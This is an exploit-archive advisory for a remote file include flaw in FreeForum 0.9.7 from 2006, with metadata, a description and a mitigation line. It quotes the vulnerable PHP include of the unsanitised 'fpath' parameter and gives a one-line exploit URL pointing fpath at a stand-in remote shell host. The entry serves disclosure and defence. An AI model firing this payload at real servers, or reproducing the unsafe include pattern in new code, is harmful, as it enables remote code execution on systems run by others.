FreeForum 0.9.7 (fpath) Remote File Include Vulnerability

vendor:

FreeForum

by:

XORON

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: FreeForum

Affected Version From: 0.9.7

Affected Version To: 0.9.7

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

FreeForum 0.9.7 (fpath) Remote File Include Vulnerability

FreeForum 0.9.7 is vulnerable to a remote file include vulnerability. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'fpath' parameter of the 'forum.php' script. An attacker can exploit this vulnerability to include arbitrary remote files, allowing for the execution of arbitrary PHP code on the vulnerable system.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

FreeForum 0.9.7 (fpath) Remote File Include Vulnerability

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Discovered by XORON(turkish hacker)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

URL: http://www.ezforum.de/downloads/Forum.zip (229kb)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Vuln. Code: in forum.php.

if(!isset($cfg_file))$cfg_file="config/config.inc.php";
if(!isset($fpath))$fpath=".";
if(!isset($getvar))$getvar='';
include("$fpath/lib/php/classes.php");

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Exploit: /forum.php?cfg_file=1&fpath=http://sh3LL?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanx: str0ke, Preddy, Ironfist, Stansar, SHiKaA, O.G,

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2006-10-07]